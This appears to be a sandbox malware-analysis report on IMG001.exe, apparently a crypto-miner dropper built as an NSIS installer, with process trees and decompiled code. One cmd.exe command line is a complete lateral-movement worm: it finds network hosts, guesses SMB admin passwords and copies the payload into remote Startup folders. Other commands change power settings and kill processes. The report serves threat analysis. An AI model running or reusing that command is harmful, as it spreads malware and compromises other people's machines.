MD5 hash:	62E3FDCEC6EED38E01571716A25D4547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powercfg.exe PID: 5800 Parent PID: 2100

General

Start time:	04:50:24
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):	true
Commandline:	powercfg /CHANGE -hibernate-timeout-ac 0
Imagebase:	0x970000
File size:	80896 bytes
MD5 hash:	FA313DB034098C26069DBADD6178DEB3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powercfg.exe PID: 6340 Parent PID: 2100

General

Start time:	04:50:25
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):	true
Commandline:	Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
Imagebase:	0x970000
File size:	80896 bytes
MD5 hash:	FA313DB034098C26069DBADD6178DEB3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6476 Parent PID: 5600

General

Start time:	04:50:25
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /v:on /c @(for /f 'usebackq tokens=1' %i in (`@net view^\|find /i '\\' ^\|^\| @arp -a^\|find /i ' 1'`) do @set str_!random!=%i)& @for /f 'usebackq tokens=1* delims==' %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:- =!& set f=IMG001.exe& set n=1704& @if not '!s!'=='%COMPUTERNAME%' @echo connect to \\!s! & (for /f 'usebackq tokens=1' %j in (`net view \\!s!^\|find /i ' '`) do @echo f\|xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' '\\!s!\%j\!f!' 1>nul && @echo copy to '\\!s!\%j\!f!') & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin ) do @for %p in (0 1 123 %u !n! '') do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not '%p%u'=='01' net use %c '%p' /user:'%u') && @((echo [Section1] & echo p=%p %u)>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & @(for %d in ('%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\ \ \ \!f!' '%c\Documents and Settings\All Users\ \ \ \!f!' '%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!' '%c\Windows\All Users\Start menu\Programs\Startup\!f!' '%c\%u\!f!' ) do @echo f\|@xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' %d 1>nul && @echo copy to %d) & @echo nul>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6612 Parent PID: 6476

General

Start time:	04:50:25
Start date:	14/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6632 Parent PID: 4456

General

Start time:	04:50:25
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6792 Parent PID: 6632

General

Start time:	04:50:26
Start date:	14/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6856 Parent PID: 6476

General

Start time:	04:50:26
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c @net view\|find /i '\\' \|\| @arp -a\|find /i ' 1'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: taskkill.exe PID: 6920 Parent PID: 6632

General

Start time:	04:50:26
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im tftp.exe
Imagebase:	0x870000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: net.exe PID: 6948 Parent PID: 6856

General

Start time:	04:50:26
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net view
Imagebase:	0x1030000
File size:	46592 bytes
MD5 hash:	DD0561156F62BC1958CE0E370B23711B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: find.exe PID: 7032 Parent PID: 6856

General

Start time:	04:50:27
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\find.exe
Wow64 process (32bit):	true
Commandline:	find /i '\\'
Imagebase:	0x3e0000
File size:	14848 bytes
MD5 hash:	9BCB215932501B45D204DC8E592EA996
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: ARP.EXE PID: 7084 Parent PID: 6856

General

Start time:	04:50:27
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\ARP.EXE
Wow64 process (32bit):	true
Commandline:	arp -a
Imagebase:	0xe20000
File size:	22528 bytes
MD5 hash:	D1FC7CF6D47929C565C8EB3AFD4CFF84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: find.exe PID: 7108 Parent PID: 6856

General

Start time:	04:50:28
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\find.exe
Wow64 process (32bit):	true
Commandline:	find /i ' 1'
Imagebase:	0x3e0000
File size:	14848 bytes
MD5 hash:	9BCB215932501B45D204DC8E592EA996
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: IMG001.exe PID: 968 Parent PID: 5776 IMG001.exeCOMMON

Execution Graph

Execution Coverage:	26.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.5%
Total number of Nodes:	432
Total number of Limit Nodes:	13

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004030DE, Relevance: 59.8, APIs: 24, Strings: 10, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v392;
				int _v396;
				int _v400;
				signed int _v404;
				CHAR* _v408;
				int _v412;
				struct _SECURITY_ATTRIBUTES* _v416;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				char* _t42;
				signed int _t44;
				void* _t48;
				int _t50;
				signed int _t51;
				signed int _t54;
				int _t55;
				signed int _t59;
				void* _t78;
				void* _t88;
				void* _t90;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t99;
				signed int _t102;
				signed int _t105;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t98 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x7c5758 = _t34;
				 *0x7c56a4 = E00405D12(8);
				SHGetFileInfoA(0x7a8468, 0,  &_v360, 0x160, 0); // executed
				E004059F0(0x7c16a0, "NSIS Error");
				E004059F0(0x7ee000, GetCommandLineA());
				 *0x7c56a0 = GetModuleHandleA(0);
				_t42 = 0x7ee000;
				if( *0x7ee000 == 0x22) {
					_v404 = 0x22;
					_t42 = 0x7ee001;
				}
				_t44 = CharNextA(E0040550E(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t90 =  *_t44;
					_t108 = _t90;
					if(_t90 == 0) {
						break;
					}
					__eflags = _t90 - 0x20;
					if(_t90 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E0040550E(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t98 = _t98 | 0x00000002;
									__eflags = _t98;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t98 = _t98 | 0x00000004;
									__eflags = _t98;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E004059F0(0x7f0000, _t44 + 2);
								L20:
								GetTempPathA(0x2000, 0x7f8000); // executed
								_t48 = E004030AA(_t108);
								_t109 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA(0x7f6000); // executed
									_t50 = E00402C22(_t110, _t98); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										if(_v404 == 0) {
											__eflags =  *0x7c5734;
											if( *0x7c5734 != 0) {
												_t105 = E00405D12(3);
												_t99 = E00405D12(4);
												_t54 = E00405D12(5);
												__eflags = _t105;
												_t96 = _t54;
												if(_t105 != 0) {
													__eflags = _t99;
													if(_t99 != 0) {
														__eflags = _t96;
														if(_t96 != 0) {
															_t59 =  *_t105(GetCurrentProcess(), 0x28,  &_v392);
															__eflags = _t59;
															if(_t59 != 0) {
																 *_t99(0, "SeShutdownPrivilege",  &_v396);
																_v412 = 1;
																_v400 = 2;
																 *_t96(_v416, 0,  &_v412, 0, 0, 0);
															}
														}
													}
												}
												_t55 = ExitWindowsEx(2, 0);
												__eflags = _t55;
												if(_t55 == 0) {
													E0040140B(9);
												}
											}
											_t51 =  *0x7c574c;
											__eflags = _t51 - 0xffffffff;
											if(_t51 != 0xffffffff) {
												_v396 = _t51;
											}
											ExitProcess(_v396);
										}
										E004052B1(_v404, 0x200010);
										ExitProcess(2);
									}
									if( *0x7c56bc == 0) {
										L31:
										 *0x7c574c =  *0x7c574c | 0xffffffff;
										_v400 = E00403539();
										goto L32;
									}
									_t102 = E0040550E(0x7ee000, 0);
									while(_t102 >= 0x7ee000) {
										__eflags =  *_t102 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t102 = _t102 - 1;
										__eflags = _t102;
									}
									_t114 = _t102 - 0x7ee000;
									_v408 = "Error launching installer";
									if(_t102 < 0x7ee000) {
										lstrcatA(0x7f8000, "~nsu.tmp");
										if(lstrcmpiA(0x7f8000, 0x7f4000) == 0) {
											goto L32;
										}
										CreateDirectoryA(0x7f8000, 0);
										SetCurrentDirectoryA(0x7f8000);
										if( *0x7f0000 == 0) {
											E004059F0(0x7f0000, 0x7f4000);
										}
										E004059F0(0x7c6000, _v396);
										 *0x7c8000 = 0x41;
										_t97 = 0x1a;
										do {
											E00405A12(0, _t97, 0x7a6468, 0x7a6468,  *((intOrPtr*)( *0x7c56b0 + 0x120)));
											DeleteFileA(0x7a6468);
											if(_v416 != 0 && CopyFileA(0x7fc000, 0x7a6468, 1) != 0) {
												_push(0);
												_push(0x7a6468);
												E0040573E();
												E00405A12(0, _t97, 0x7a6468, 0x7a6468,  *((intOrPtr*)( *0x7c56b0 + 0x124)));
												_t78 = E00405250(0x7a6468);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_v416 = 0;
												}
											}
											 *0x7c8000 =  *0x7c8000 + 1;
											_t97 = _t97 - 1;
										} while (_t97 != 0);
										_push(0);
										_push(0x7f8000);
										E0040573E();
										goto L32;
									}
									 *_t102 = 0;
									_t103 = _t102 + 4;
									if(E004055C4(_t114, _t102 + 4) == 0) {
										goto L32;
									}
									E004059F0(0x7f0000, _t103);
									E004059F0(0x7f2000, _t103);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(0x7f8000, 0x1ffb);
								lstrcatA(0x7f8000, "\\Temp");
								_t88 = E004030AA(_t109);
								_t110 = _t88;
								if(_t88 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

0x004030ea
0x004030ee
0x004030f6
0x004030f8
0x004030fd
0x00403108
0x0040310f
0x00403117
0x00403121
0x00403137
0x00403147
0x00403159
0x0040316c
0x00403171
0x00403173
0x00403175
0x0040317a
0x0040317a
0x0040318a
0x00403190
0x004031f9
0x004031f9
0x004031fb
0x004031fd
0x00000000
0x00000000
0x00403196
0x00403199
0x004031a1
0x004031a1
0x004031a4
0x004031a9
0x004031ab
0x004031ab
0x004031ac
0x004031ac
0x004031b1
0x004031b4
0x004031e9
0x004031ee
0x004031f3
0x004031f6
0x004031f8
0x004031f8
0x004031f8
0x00000000
0x004031b6
0x004031b6
0x004031b7
0x004031ba
0x004031c2
0x004031c5
0x004031c7
0x004031c7
0x004031c7
0x004031c5
0x004031ca
0x004031d0
0x004031d8
0x004031db
0x004031dd
0x004031dd
0x004031dd
0x004031db
0x004031e0
0x004031e7
0x00403201
0x00403204
0x0040320d
0x00403212
0x0040321d
0x00403223
0x00403228
0x0040322a
0x0040324c
0x00403251
0x00403258
0x0040325f
0x00403263
0x004032ca
0x004032ca
0x004032cf
0x004032d9
0x004033c4
0x004033ca
0x004033d5
0x004033de
0x004033e0
0x004033e5
0x004033e7
0x004033e9
0x004033eb
0x004033ed
0x004033ef
0x004033f1
0x00403401
0x00403403
0x00403405
0x00403412
0x00403421
0x00403429
0x00403431
0x00403431
0x00403405
0x004033f1
0x004033ed
0x00403436
0x0040343c
0x0040343e
0x00403442
0x00403442
0x0040343e
0x00403447
0x0040344c
0x0040344f
0x00403451
0x00403451
0x00403459
0x00403459
0x004032e8
0x004032ef
0x004032ef
0x0040326b
0x004032ba
0x004032ba
0x004032c6
0x00000000
0x004032c6
0x00403274
0x00403281
0x00403278
0x0040327e
0x00000000
0x00000000
0x00403280
0x00403280
0x00403280
0x00403285
0x00403287
0x0040328f
0x004032fb
0x0040330f
0x00000000
0x00000000
0x00403313
0x0040331a
0x00403326
0x0040332e
0x0040332e
0x0040333c
0x00403343
0x0040334c
0x00403352
0x0040335e
0x00403364
0x0040336e
0x00403382
0x00403383
0x00403384
0x00403395
0x0040339b
0x004033a2
0x004033a5
0x004033ab
0x004033ab
0x004033a2
0x004033af
0x004033b5
0x004033b5
0x004033b8
0x004033b9
0x004033ba
0x00000000
0x004033ba
0x00403291
0x00403293
0x0040329e
0x00000000
0x00000000
0x004032a6
0x004032b1
0x004032b6
0x00000000
0x004032b6
0x00403232
0x0040323e
0x00403243
0x00403248
0x0040324a
0x00000000
0x00000000
0x00000000
0x0040324a
0x00000000
0x004031e7
0x00000000
0x00000000
0x00000000
0x0040319b
0x0040319b
0x0040319b
0x0040319c
0x0040319c
0x00000000
0x0040319b
0x00000000

APIs

#17.COMCTL32 ref: 004030FD
SetErrorMode.KERNELBASE(00008001), ref: 00403108
OleInitialize.OLE32(00000000), ref: 0040310F

Part of subcall function 00405D12: GetModuleHandleA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D24
Part of subcall function 00405D12: LoadLibraryA.KERNELBASE(?,?,00000000,00403121,00000008), ref: 00405D2F
Part of subcall function 00405D12: GetProcAddress.KERNEL32(00000000,?), ref: 00405D40

SHGetFileInfoA.SHELL32(007A8468,00000000,?,00000160,00000000,00000008), ref: 00403137

Part of subcall function 004059F0: lstrcpynA.KERNEL32(?,?,00002000,0040314C,007C16A0,NSIS Error), ref: 004059FD

GetCommandLineA.KERNEL32(007C16A0,NSIS Error), ref: 0040314C
GetModuleHandleA.KERNEL32(00000000,007EE000,00000000), ref: 0040315F
CharNextA.USER32(00000000,007EE000,00000020), ref: 0040318A
GetTempPathA.KERNELBASE(00002000,007F8000,00000000,00000020), ref: 0040321D
GetWindowsDirectoryA.KERNEL32(007F8000,00001FFB), ref: 00403232
lstrcatA.KERNEL32(007F8000,\Temp), ref: 0040323E
DeleteFileA.KERNELBASE(007F6000), ref: 00403251
ExitProcess.KERNEL32(00000000), ref: 004032CA
OleUninitialize.OLE32(00000000), ref: 004032CF
ExitProcess.KERNEL32 ref: 004032EF
lstrcatA.KERNEL32(007F8000,~nsu.tmp,007EE000,00000000,00000000), ref: 004032FB
lstrcmpiA.KERNEL32(007F8000,007F4000,007F8000,~nsu.tmp,007EE000,00000000,00000000), ref: 00403307
CreateDirectoryA.KERNEL32(007F8000,00000000), ref: 00403313
SetCurrentDirectoryA.KERNEL32(007F8000), ref: 0040331A
DeleteFileA.KERNEL32(007A6468,007A6468,?,007C6000,?), ref: 00403364
CopyFileA.KERNEL32(007FC000,007A6468,00000001), ref: 00403378
CloseHandle.KERNEL32(00000000,007A6468,007A6468,?,007A6468,00000000), ref: 004033A5
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FA
ExitWindowsEx.USER32(00000002,00000000), ref: 00403436
ExitProcess.KERNEL32 ref: 00403459

Strings

~nsu.tmp, xrefs: 004032F5
NSIS Error, xrefs: 0040313D
\Temp, xrefs: 00403238
Error launching installer, xrefs: 00403287
/D=, xrefs: 004031E0
NCRC, xrefs: 004031CA
", xrefs: 004031AC
hdz, xrefs: 0040334D
_?=, xrefs: 00403278
SeShutdownPrivilege, xrefs: 0040340C

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$hdz$~nsu.tmp
API String ID: 553446912-3982731155
Opcode ID: d78d33de5b68f580e0f006418b0ffb6605f002c23cf02c91c73e52bd5a976f7d
Instruction ID: 1e8516f5ce796388342c1fc8f15df4c02dee863aaf22805bb0e40bc668e7fd09
Opcode Fuzzy Hash: d78d33de5b68f580e0f006418b0ffb6605f002c23cf02c91c73e52bd5a976f7d
Instruction Fuzzy Hash: B0911171904741AEE7216F618C49B2B3E9CEF05306F04457EF581BA2D2CB7C99448B6F

Uniqueness

Uniqueness Score: -1.00%

Function 00405A12, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00405A12(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x7c167c - 4 + _t36 * 4);
				}
				_t74 =  *0x7c56d8 + _t36;
				_t37 = 0x7bd640;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x7bd640;
				if(_a4 - 0x7bd640 < 0x4000) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x2000;
					if(_t86 - _t37 >= 0x2000) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405A12(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x7bd640;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xd) + 0x7c6000;
							E004059F0(_t86, (_t95 << 0xd) + 0x7c6000);
						} else {
							E0040594E(_t86,  *0x7c56a8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405C52(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x7c5724;
						if( *0x7c5724 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x2000);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x7c56a4;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x7c56a8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x7c56a8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86); // executed
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x2000);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x7c56d8;
							E004058D7(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x7c56d8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405A12(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E004059F0(_a4, _t37);
			}

0x00405a12
0x00405a12
0x00405a12
0x00405a18
0x00405a1d
0x00405a2e
0x00405a2e
0x00405a39
0x00405a3b
0x00405a40
0x00405a43
0x00405a44
0x00405a4b
0x00405a4d
0x00405a53
0x00405a56
0x00405a56
0x00405c2f
0x00405c2f
0x00405c33
0x00000000
0x00000000
0x00405a63
0x00405a69
0x00000000
0x00000000
0x00405a6f
0x00405a70
0x00405a73
0x00405a76
0x00405c22
0x00405c2c
0x00405c2e
0x00405c2e
0x00405c24
0x00405c26
0x00405c28
0x00405c29
0x00405c29
0x00000000
0x00405c22
0x00405a7c
0x00405a80
0x00405a90
0x00405a94
0x00405a9b
0x00405a9e
0x00405aa2
0x00405aa8
0x00405aab
0x00405aae
0x00405ab1
0x00405bcc
0x00405bcf
0x00405bff
0x00405c02
0x00405c07
0x00405c0b
0x00405c0b
0x00405c10
0x00405c11
0x00405c16
0x00405c19
0x00405c1b
0x00000000
0x00405c1b
0x00405bd1
0x00405bd4
0x00405be9
0x00405bf0
0x00405bd6
0x00405bdd
0x00405bdd
0x00405bf8
0x00405bfb
0x00405bc4
0x00405bc5
0x00405bc5
0x00000000
0x00405bfb
0x00405ab9
0x00405aba
0x00405ac0
0x00405ac2
0x00405adc
0x00405adc
0x00405ae3
0x00405ae3
0x00405aea
0x00405aee
0x00405aee
0x00405aef
0x00405af1
0x00405b2a
0x00405b2d
0x00405b3d
0x00405b40
0x00405b48
0x00405b4e
0x00405b4e
0x00405baa
0x00405baa
0x00405bac
0x00000000
0x00000000
0x00405b52
0x00405b59
0x00405b5a
0x00405b5c
0x00405b76
0x00405b84
0x00405b8a
0x00405b8c
0x00405ba7
0x00405ba7
0x00405ba7
0x00000000
0x00405ba7
0x00405b92
0x00405b9d
0x00405ba3
0x00405ba5
0x00000000
0x00000000
0x00000000
0x00405ba5
0x00405b5e
0x00405b61
0x00000000
0x00000000
0x00405b70
0x00405b72
0x00405b74
0x00000000
0x00000000
0x00000000
0x00405b74
0x00000000
0x00405baa
0x00405b35
0x00000000
0x00405af3
0x00405af8
0x00405b0e
0x00405b13
0x00405b16
0x00405bb3
0x00405bb3
0x00405bb7
0x00405bbf
0x00405bbf
0x00000000
0x00405bb7
0x00405b20
0x00405bae
0x00405bae
0x00405bb1
0x00000000
0x00000000
0x00000000
0x00405bb1
0x00405af1
0x00405ac4
0x00405ac8
0x00000000
0x00000000
0x00405aca
0x00405ace
